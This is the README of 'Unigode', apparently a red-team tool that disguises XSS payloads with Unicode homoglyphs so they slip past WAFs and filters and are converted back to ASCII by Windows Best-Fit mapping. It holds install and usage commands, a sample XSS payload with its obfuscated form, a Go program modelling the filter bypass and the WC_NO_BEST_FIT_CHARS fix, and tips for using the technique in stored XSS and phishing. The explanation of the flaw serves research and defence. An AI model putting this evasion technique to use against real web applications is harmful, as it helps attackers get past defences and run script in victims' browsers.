Unicode payload obfuscator that targets Windows' Best-Fit character mapping. It replaces ASCII characters with visually similar Unicode homoglyphs that a Windows component silently converts back to the original ASCII when it transcodes the string into a legacy (ANSI) code page, so a payload slips past WAF rules and filters that only inspect the Unicode form.

Yasha-ops/unigode

🧬 Unigode

Unigode is a Unicode-based payload generator designed to evade WAFs and XSS filters by exploiting Windows' Best Fit Mapping and leveraging visually similar Unicode characters. Inspired by Orange Tsai's research on bypassing filter-based protections using charset quirks, Unigode transforms standard payloads into stealthy, executable versions that slip past naive filtering.


🚀 Features

  • 🔣 Encodes text using Best Fit Unicode substitutions
  • 🎭 Obfuscates JavaScript payloads while preserving functionality
  • 🧱 Effective against poorly configured WAFs and blacklists
  • 🧾 Supports inline input (--text) or file-based input (--file)
  • ⚡ Fast, minimal, binary-ready for red teaming

Installation

go install github.com/yasha-ops/unigode@latest

# OR 

git clone https://github.com/Yasha-ops/unigode.git
cd unigode
go build -o unigode .

Usage

unigode --text "Text to encode"
unigode --file payload.txt

Example

> ./unigode --text "<img src onerror=alert(1)>"
〈ǐmg śrc ơņℿrŗℴr‗ǎļėřʋ⌠₁)〉

Why does it work?

Windows' Best-Fit mapping kicks in when a UTF-16 string is converted to a legacy, non-Unicode (ANSI) code page such as 1252. That conversion happens implicitly whenever a program on Windows calls the narrow "A" variants of the Win32 APIs, or runs on a runtime that does so on its behalf. WideCharToMultiByte with default flags does not reject a character that has no exact encoding in the target code page; it substitutes the closest lookalike, so a fullwidth "＜" (U+FF1C) comes out as "<" and the diacritic-laden letters in the example above collapse to their base letters. The substitution does not occur under the UTF-8 code page (chcp 65001) or when the caller passes WC_NO_BEST_FIT_CHARS. This behavior can be abused to craft payloads that:

  • Appear harmless or unreadable to static filters that inspect the Unicode text
  • Get translated back to valid JavaScript on backends that transcode them to an ANSI code page before the browser sees them
  • Bypass naive sanitization logic based on byte or character matching, because the bytes the filter sees are not the bytes the application ends up with

This technique was notably weaponized by Orange Tsai (with splitline, in the WorstFit research on Windows ANSI Best-Fit conversions) to bypass SSRF and WAF protections. Unigode brings the same idea to the client-side XSS world with instant payload generation.
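
The Go program below is an added illustration, not part of Unigode's source: it models the three stages that make the trick work. A hypothetical blacklist filter (BlockedByFilter) inspects the Unicode input, ToANSI models what WideCharToMultiByte with default flags does to that input, and ToANSIStrict models the same call with WC_NO_BEST_FIT_CHARS. The homoglyph set is deliberately limited to fullwidth ASCII (U+FF01..U+FF5E), which Microsoft's bestfit1252.txt maps onto plain ASCII; Unigode's own table, as the example output above shows, draws on many more lookalikes. The conversion functions are a model of the Windows behavior, not a call into Windows, and they only cover the ASCII range of code page 1252.

```go
package main

import (
	"fmt"
	"strings"
)

// bestFit1252 models a small slice of Microsoft's Best-Fit table for code
// page 1252: fullwidth ASCII (U+FF01..U+FF5E) collapses onto U+0021..U+007E.
// Hand-picked subset for illustration; the real table (bestfit1252.txt) and
// Unigode's own substitution table contain many more lookalikes.
func bestFit1252(r rune) (byte, bool) {
	if r >= 0xFF01 && r <= 0xFF5E {
		return byte(r - 0xFEE0), true
	}
	return 0, false
}

// Obfuscate swaps every printable ASCII rune (except space) for its
// fullwidth twin, the way a Best-Fit aware payload generator would.
func Obfuscate(s string) string {
	var b strings.Builder
	for _, r := range s {
		if r > 0x20 && r < 0x7F {
			b.WriteRune(r + 0xFEE0)
		} else {
			b.WriteRune(r)
		}
	}
	return b.String()
}

// ToANSI models WideCharToMultiByte(CP 1252, dwFlags = 0): exact hits pass
// through, Best-Fit candidates are silently rewritten, anything else becomes
// '?'. Only the ASCII range of CP 1252 is modelled here.
func ToANSI(s string) string {
	return convert(s, true)
}

// ToANSIStrict models the same call with WC_NO_BEST_FIT_CHARS: unmappable
// runes become '?' instead of being "fixed up", which is the mitigation.
func ToANSIStrict(s string) string {
	return convert(s, false)
}

func convert(s string, bestFit bool) string {
	var b strings.Builder
	for _, r := range s {
		if r < 0x80 {
			b.WriteRune(r)
			continue
		}
		if c, ok := bestFit1252(r); ok && bestFit {
			b.WriteByte(c)
		} else {
			b.WriteByte('?')
		}
	}
	return b.String()
}

// BlockedByFilter is a deliberately naive blacklist (hypothetical WAF rule):
// it inspects the Unicode text before any code-page conversion, so it never
// sees the ASCII form that the application ends up with.
func BlockedByFilter(s string) bool {
	lower := strings.ToLower(s)
	for _, bad := range []string{"<img", "<script", "onerror", "alert("} {
		if strings.Contains(lower, bad) {
			return true
		}
	}
	return false
}

func main() {
	payload := `<img src onerror=alert(1)>` // constructed sample payload
	obf := Obfuscate(payload)
	fmt.Printf("original:    %s  blocked=%v\n", payload, BlockedByFilter(payload))
	fmt.Printf("obfuscated:  %s  blocked=%v\n", obf, BlockedByFilter(obf))
	fmt.Printf("after Best-Fit conversion: %s\n", ToANSI(obf))
	fmt.Printf("with WC_NO_BEST_FIT_CHARS: %s\n", ToANSIStrict(obf))
}
```

The filter blocks the plain payload and lets the fullwidth version through, yet ToANSI turns the fullwidth version back into the exact original string. ToANSIStrict shows why the fix sits on the application side rather than in the filter: with WC_NO_BEST_FIT_CHARS (or by staying in UTF-8 / wide APIs end to end) the lookalikes degrade to "?" and never become markup.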


Pro tips

  • Combine with polyglot payloads or event handler tricks; Best-Fit only disguises the characters, so the decoded payload still has to be valid JavaScript or HTML in the context where it lands
  • The conversion happens only where a Windows component transcodes the input into a legacy ANSI code page (applications built on the narrow "A" Win32 APIs, PHP-CGI on Windows being the best-known case). Linux backends, the UTF-8 code page (65001) and callers that pass WC_NO_BEST_FIT_CHARS leave the Unicode untouched, and the browser then renders it as inert text, so confirm the target stack and encoding before relying on it
  • Most useful for stored XSS and phishing content where the stored form is filtered or reviewed but the served form has already been transcoded

Disclaimer

This tool is for educational and authorized security research purposes only. Unauthorized use against systems without consent is strictly forbidden.


License

This project is licensed under the Creative Commons Attribution-NonCommercial 4.0 International (CC BY-NC 4.0).
You are free to use, modify, and share — but commercial use is strictly prohibited.
